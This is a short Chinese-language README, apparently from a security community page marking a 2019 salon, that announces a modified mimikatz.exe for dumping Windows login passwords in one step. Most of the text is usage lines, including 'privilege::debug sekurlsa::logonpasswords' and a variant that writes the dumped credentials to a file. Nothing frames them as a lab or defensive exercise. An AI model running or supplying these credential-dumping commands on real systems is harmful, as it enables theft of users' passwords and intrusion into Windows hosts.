==============================================================
   预祝铸剑2019-圈子社区沙龙圆满成功！

                                     Secquan.rog
                                         Lmy
==============================================================

注：基于mimikatz.exe修改一键获取Windows系统密码，同时完全兼容原版用法。
 
 例子，完全兼容原版用法。
 mimikatz.exe
 mimikatz.exe privilege::debug sekurlsa::logonpasswords  exit
 mimikatz.exe privilege::debug log sekurlsa::logonpasswords  exit >> shash.txt

